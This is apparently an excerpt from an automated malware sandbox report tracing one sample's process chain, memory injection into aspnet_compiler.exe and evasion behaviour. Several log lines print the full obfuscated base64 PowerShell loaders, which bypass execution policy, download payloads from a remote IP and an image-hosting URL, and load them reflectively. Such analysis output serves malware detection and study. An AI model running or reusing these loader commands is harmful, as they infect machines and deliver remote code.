Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_012BB440 mov eax, dword ptr fs:[00000030h] 12_2_012BB440
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: Yara match File source: amsi32_3004.amsi.csv, type: OTHER
Source: Yara match File source: amsi32_3004.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3004, type: MEMORYSTR
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 92B008 Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C poweRshElL.Exe -ex bypaSs -nOp -w 1 -c DEviCECrEdEnTIALDePLOYMENT.ExE ; INvoKe-eXPrESSioN($(INVOKe-EXPressION('[syStEm.text.eNCodinG]'+[cHar]58+[ChAr]0x3A+'Utf8.GEtSTrInG([SYsteM.cOnvErT]'+[ChaR]58+[ChaR]0X3A+'froMbAsE64strinG('+[Char]34+'JHN2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFUmRFZklOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT04uRExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExlU3ZOR3Z3YWtaLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcWJFcyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhLbWpGVFRlLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGcsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtVGtaVXFXVG53KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkdUIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRzdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjI5Lzc3MC9zZWVteWJlc3R0aGluZ3N3aGF0ZG9pbmdmb3JiZXR0ZXIudElGIiwiJEVudjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3doYXRkb2luZ2ZvcmJlLnZiUyIsMCwwKTtTVEFSVC1TTGVlUCgzKTtpSSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGF0ZG9pbmdmb3JiZS52YlMi'+[cHAr]34+'))')))" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poweRshElL.Exe -ex bypaSs -nOp -w 1 -c DEviCECrEdEnTIALDePLOYMENT.ExE ; INvoKe-eXPrESSioN($(INVOKe-EXPressION('[syStEm.text.eNCodinG]'+[cHar]58+[ChAr]0x3A+'Utf8.GEtSTrInG([SYsteM.cOnvErT]'+[ChaR]58+[ChaR]0X3A+'froMbAsE64strinG('+[Char]34+'JHN2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFUmRFZklOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT04uRExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExlU3ZOR3Z3YWtaLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcWJFcyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhLbWpGVFRlLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGcsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtVGtaVXFXVG53KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkdUIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRzdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjI5Lzc3MC9zZWVteWJlc3R0aGluZ3N3aGF0ZG9pbmdmb3JiZXR0ZXIudElGIiwiJEVudjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3doYXRkb2luZ2ZvcmJlLnZiUyIsMCwwKTtTVEFSVC1TTGVlUCgzKTtpSSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGF0ZG9pbmdmb3JiZS52YlMi'+[cHAr]34+'))')))" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3cxbggpe\3cxbggpe.cmdline" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswhatdoingforbe.vbS" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA8D6.tmp" "c:\Users\user\AppData\Local\Temp\3cxbggpe\CSC280B62266E03482F8F906EDB13385254.TMP" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $doctor = 'JGJlaSA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRhbW9uaWVtaWEgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRxdWFscXVlciA9ICRhbW9uaWVtaWEuRG93bmxvYWREYXRhKCRiZWkpOyRhdGVycmFnZW0gPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcXVhbHF1ZXIpOyRsZWlyaWEgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGFjYXBuYSA9ICc8PEJBU0U2NF9FTkQ+Pic7JGlucXVpZXR1ZGUgPSAkYXRlcnJhZ2VtLkluZGV4T2YoJGxlaXJpYSk7JHBlY3RhciA9ICRhdGVycmFnZW0uSW5kZXhPZigkYWNhcG5hKTskaW5xdWlldHVkZSAtZ2UgMCAtYW5kICRwZWN0YXIgLWd0ICRpbnF1aWV0dWRlOyRpbnF1aWV0dWRlICs9ICRsZWlyaWEuTGVuZ3RoOyRjb25kaWNlbnRlID0gJHBlY3RhciAtICRpbnF1aWV0dWRlOyRuaWNvbGF0byA9ICRhdGVycmFnZW0uU3Vic3RyaW5nKCRpbnF1aWV0dWRlLCAkY29uZGljZW50ZSk7JG1hZHJpbGhlaXJhID0gLWpvaW4gKCRuaWNvbGF0by5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkbmljb2xhdG8uTGVuZ3RoKV07JGNyZWR1bGlkYWRlID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbWFkcmlsaGVpcmEpOyRyZWRpemltYXIgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjcmVkdWxpZGFkZSk7JHJlYmVsbGFkb3IgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKCdWQUknKTskcmViZWxsYWRvci5JbnZva2UoJG51bGwsIEAoJ3R4dC5BQ01BQy8wNzcvOTIuMzIxLjU0Mi4yNzEvLzpwdHRoJywgJyRyYXBhZG8nLCAnJHJhcGFkbycsICckcmFwYWRvJywgJ2FzcG5ldF9jb21waWxlcicsICckcmFwYWRvJywgJyRyYXBhZG8nLCckcmFwYWRvJywnJHJhcGFkbycsJyRyYXBhZG8nLCckcmFwYWRvJywnJHJhcGFkbycsJzEnLCckcmFwYWRvJykpOw==';$theatrelho = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($doctor));Invoke-Expression $theatrelho Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jhn2icagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhreqtvflwrsagicagicagicagicagicagicagicagicagicagicaglu1fbujfumrfzkloavrjt24gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1ckxnt04urexmiiwgicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagiexlu3zor3z3ywtalhn0cmluzyagicagicagicagicagicagicagicagicagicagicagcwjfcyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagiehlbwpgvfrllhvpbnqgicagicagicagicagicagicagicagicagicagicagigcssw50uhryicagicagicagicagicagicagicagicagicagicagicbtvgtavxfxvg53ktsnicagicagicagicagicagicagicagicagicagicagicattmfnzsagicagicagicagicagicagicagicagicagicagicagikduiiagicagicagicagicagicagicagicagicagicagicaglw5btuvtuefdzsagicagicagicagicagicagicagicagicagicagicagbxcgicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicrzdjo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze3mi4ynduumtizlji5lzc3mc9zzwvtewjlc3r0agluz3n3agf0zg9pbmdmb3jizxr0zxiudelgiiwijevudjpbufbeqvrbxhnlzw15ymvzdhroaw5nc3doyxrkb2luz2zvcmjllnziuyismcwwktttvefsvc1ttgvlucgzkttpssagicagicagicagicagicagicagicagicagicagicagiirltly6qvbqrefuqvxzzwvtewjlc3r0agluz3n3agf0zg9pbmdmb3jizs52ylmi'+[char]34+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jhn2icagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhreqtvflwrsagicagicagicagicagicagicagicagicagicagicaglu1fbujfumrfzkloavrjt24gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1ckxnt04urexmiiwgicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagiexlu3zor3z3ywtalhn0cmluzyagicagicagicagicagicagicagicagicagicagicagcwjfcyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagiehlbwpgvfrllhvpbnqgicagicagicagicagicagicagicagicagicagicagigcssw50uhryicagicagicagicagicagicagicagicagicagicagicbtvgtavxfxvg53ktsnicagicagicagicagicagicagicagicagicagicagicattmfnzsagicagicagicagicagicagicagicagicagicagicagikduiiagicagicagicagicagicagicagicagicagicagicaglw5btuvtuefdzsagicagicagicagicagicagicagicagicagicagicagbxcgicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicrzdjo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze3mi4ynduumtizlji5lzc3mc9zzwvtewjlc3r0agluz3n3agf0zg9pbmdmb3jizxr0zxiudelgiiwijevudjpbufbeqvrbxhnlzw15ymvzdhroaw5nc3doyxrkb2luz2zvcmjllnziuyismcwwktttvefsvc1ttgvlucgzkttpssagicagicagicagicagicagicagicagicagicagicagiirltly6qvbqrefuqvxzzwvtewjlc3r0agluz3n3agf0zg9pbmdmb3jizs52ylmi'+[char]34+'))')))"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $doctor = 'jgjlasa9icdodhrwczovl3jlcy5jbg91zgluyxj5lmnvbs9kexrmbhq2mw4vaw1hz2uvdxbsb2fkl3yxnzmzmtm0otq3l2jrbhb5c2v5zxv0ngltchc1mg4xlmpwzyanoyrhbw9uawvtawegpsbozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50oyrxdwfscxvlcia9icrhbw9uawvtaweurg93bmxvywreyxrhkcrizwkpoyrhdgvycmfnzw0gpsbbu3lzdgvtllrlehqurw5jb2rpbmddojpvvey4lkdldfn0cmluzygkcxvhbhf1zxipoyrszwlyawegpsanpdxcqvnfnjrfu1rbulq+pic7jgfjyxbuysa9icc8pejbu0u2nf9ftkq+pic7jglucxvpzxr1zgugpsakyxrlcnjhz2vtlkluzgv4t2yojgxlaxjpysk7jhbly3rhcia9icrhdgvycmfnzw0usw5kzxhpzigkywnhcg5hktskaw5xdwlldhvkzsatz2ugmcatyw5kicrwzwn0yxiglwd0icrpbnf1awv0dwrloyrpbnf1awv0dwrlics9icrszwlyaweutgvuz3rooyrjb25kawnlbnrlid0gjhbly3rhciaticrpbnf1awv0dwrloyruawnvbgf0bya9icrhdgvycmfnzw0uu3vic3ryaw5nkcrpbnf1awv0dwrllcaky29uzgljzw50zsk7jg1hzhjpbghlaxjhid0glwpvaw4gkcruawnvbgf0by5ub0noyxjbcnjhesgpihwgrm9yrwfjac1pymply3qgeyakxyb9kvstms4ulsgkbmljb2xhdg8utgvuz3rokv07jgnyzwr1bglkywrlid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygkbwfkcmlsagvpcmepoyryzwrpemltyxigpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkcrjcmvkdwxpzgfkzsk7jhjlymvsbgfkb3igpsbbzg5sawiusu8usg9tzv0ur2v0twv0ag9kkcdwquknktskcmvizwxsywrvci5jbnzva2uojg51bgwsieaoj3r4dc5bq01bqy8wnzcvotiumzixlju0mi4ynzevlzpwdhrojywgjyryyxbhzg8nlcanjhjhcgfkbycsicckcmfwywrvjywgj2fzcg5ldf9jb21wawxlcicsicckcmfwywrvjywgjyryyxbhzg8nlcckcmfwywrvjywnjhjhcgfkbycsjyryyxbhzg8nlcckcmfwywrvjywnjhjhcgfkbycsjzenlcckcmfwywrvjykpow==';$theatrelho = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($doctor));invoke-expression $theatrelho
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jhn2icagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhreqtvflwrsagicagicagicagicagicagicagicagicagicagicaglu1fbujfumrfzkloavrjt24gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1ckxnt04urexmiiwgicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagiexlu3zor3z3ywtalhn0cmluzyagicagicagicagicagicagicagicagicagicagicagcwjfcyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagiehlbwpgvfrllhvpbnqgicagicagicagicagicagicagicagicagicagicagigcssw50uhryicagicagicagicagicagicagicagicagicagicagicbtvgtavxfxvg53ktsnicagicagicagicagicagicagicagicagicagicagicattmfnzsagicagicagicagicagicagicagicagicagicagicagikduiiagicagicagicagicagicagicagicagicagicagicaglw5btuvtuefdzsagicagicagicagicagicagicagicagicagicagicagbxcgicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicrzdjo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze3mi4ynduumtizlji5lzc3mc9zzwvtewjlc3r0agluz3n3agf0zg9pbmdmb3jizxr0zxiudelgiiwijevudjpbufbeqvrbxhnlzw15ymvzdhroaw5nc3doyxrkb2luz2zvcmjllnziuyismcwwktttvefsvc1ttgvlucgzkttpssagicagicagicagicagicagicagicagicagicagicagiirltly6qvbqrefuqvxzzwvtewjlc3r0agluz3n3agf0zg9pbmdmb3jizs52ylmi'+[char]34+'))')))" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jhn2icagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhreqtvflwrsagicagicagicagicagicagicagicagicagicagicaglu1fbujfumrfzkloavrjt24gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1ckxnt04urexmiiwgicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagiexlu3zor3z3ywtalhn0cmluzyagicagicagicagicagicagicagicagicagicagicagcwjfcyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagiehlbwpgvfrllhvpbnqgicagicagicagicagicagicagicagicagicagicagigcssw50uhryicagicagicagicagicagicagicagicagicagicagicbtvgtavxfxvg53ktsnicagicagicagicagicagicagicagicagicagicagicattmfnzsagicagicagicagicagicagicagicagicagicagicagikduiiagicagicagicagicagicagicagicagicagicagicaglw5btuvtuefdzsagicagicagicagicagicagicagicagicagicagicagbxcgicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicrzdjo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze3mi4ynduumtizlji5lzc3mc9zzwvtewjlc3r0agluz3n3agf0zg9pbmdmb3jizxr0zxiudelgiiwijevudjpbufbeqvrbxhnlzw15ymvzdhroaw5nc3doyxrkb2luz2zvcmjllnziuyismcwwktttvefsvc1ttgvlucgzkttpssagicagicagicagicagicagicagicagicagicagicagiirltly6qvbqrefuqvxzzwvtewjlc3r0agluz3n3agf0zg9pbmdmb3jizs52ylmi'+[char]34+'))')))" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $doctor = 'jgjlasa9icdodhrwczovl3jlcy5jbg91zgluyxj5lmnvbs9kexrmbhq2mw4vaw1hz2uvdxbsb2fkl3yxnzmzmtm0otq3l2jrbhb5c2v5zxv0ngltchc1mg4xlmpwzyanoyrhbw9uawvtawegpsbozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50oyrxdwfscxvlcia9icrhbw9uawvtaweurg93bmxvywreyxrhkcrizwkpoyrhdgvycmfnzw0gpsbbu3lzdgvtllrlehqurw5jb2rpbmddojpvvey4lkdldfn0cmluzygkcxvhbhf1zxipoyrszwlyawegpsanpdxcqvnfnjrfu1rbulq+pic7jgfjyxbuysa9icc8pejbu0u2nf9ftkq+pic7jglucxvpzxr1zgugpsakyxrlcnjhz2vtlkluzgv4t2yojgxlaxjpysk7jhbly3rhcia9icrhdgvycmfnzw0usw5kzxhpzigkywnhcg5hktskaw5xdwlldhvkzsatz2ugmcatyw5kicrwzwn0yxiglwd0icrpbnf1awv0dwrloyrpbnf1awv0dwrlics9icrszwlyaweutgvuz3rooyrjb25kawnlbnrlid0gjhbly3rhciaticrpbnf1awv0dwrloyruawnvbgf0bya9icrhdgvycmfnzw0uu3vic3ryaw5nkcrpbnf1awv0dwrllcaky29uzgljzw50zsk7jg1hzhjpbghlaxjhid0glwpvaw4gkcruawnvbgf0by5ub0noyxjbcnjhesgpihwgrm9yrwfjac1pymply3qgeyakxyb9kvstms4ulsgkbmljb2xhdg8utgvuz3rokv07jgnyzwr1bglkywrlid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygkbwfkcmlsagvpcmepoyryzwrpemltyxigpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkcrjcmvkdwxpzgfkzsk7jhjlymvsbgfkb3igpsbbzg5sawiusu8usg9tzv0ur2v0twv0ag9kkcdwquknktskcmvizwxsywrvci5jbnzva2uojg51bgwsieaoj3r4dc5bq01bqy8wnzcvotiumzixlju0mi4ynzevlzpwdhrojywgjyryyxbhzg8nlcanjhjhcgfkbycsicckcmfwywrvjywgj2fzcg5ldf9jb21wawxlcicsicckcmfwywrvjywgjyryyxbhzg8nlcckcmfwywrvjywnjhjhcgfkbycsjyryyxbhzg8nlcckcmfwywrvjywnjhjhcgfkbycsjzenlcckcmfwywrvjykpow==';$theatrelho = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($doctor));invoke-expression $theatrelho Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
